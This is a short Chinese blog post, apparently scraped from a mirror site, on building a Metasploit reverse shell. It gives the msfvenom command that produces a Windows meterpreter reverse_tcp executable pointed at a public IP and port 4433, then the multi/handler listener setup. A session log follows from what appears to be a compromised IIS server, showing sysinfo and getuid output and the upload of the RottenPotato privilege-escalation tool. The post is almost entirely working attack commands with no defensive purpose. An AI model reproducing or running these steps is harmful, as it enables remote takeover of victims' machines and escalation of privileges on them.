zoukankan      html  css  js  c++  java
  • msf制作反弹shell

    msf制作shell

    1 .制作反弹shell-exe文件

    执行命令

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
    
    

    LHOST为公网IP

    LPORT为反弹端口

    4433.exe为生成文件

    2.控制端启动msfconsole,获取监听

    运行命令

    msfconsle
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
    msf5 exploit(multi/handler) > set LPORT 4433
    msf5 exploit(multi/handler) > run
    
    
    
    3.反弹成功
    meterpreter > sysinfo
    Computer        : WIN-UKKED2CCSHJ
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 3
    Meterpreter     : x86/windows
    
    meterpreter > getuid
    Server username: IIS APPPOOLpadt002
    
    #上传文件
    meterpreter > upload /root/RottenPotato/rottenpotato.exe
    [*] uploading  : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    [*] uploaded   : /root/RottenPotato/rottenpotato.exe -> rottenpotato.exe
    
    
    所有的胜利,与征服自己的胜利比起来,都是微不足道;所有的失败,与失去自己的失败比起来,更是微不足道。
  • 相关阅读:
    linux父子进程问题
    Raft协议--中文论文介绍
    adb、pm命令操作apk包
    gradle配置
    命令行 更新Android sdk
    Gradle 脚本剪片---copy
    Java数组,去掉重复值、增加、删除数组元素
    注解Annotation 详解(转)
    MAC自带的SVN进行升级
    Android Studio 简单功能介绍
  • 原文地址:https://www.cnblogs.com/8gman/p/12303787.html
Copyright © 2011-2022 走看看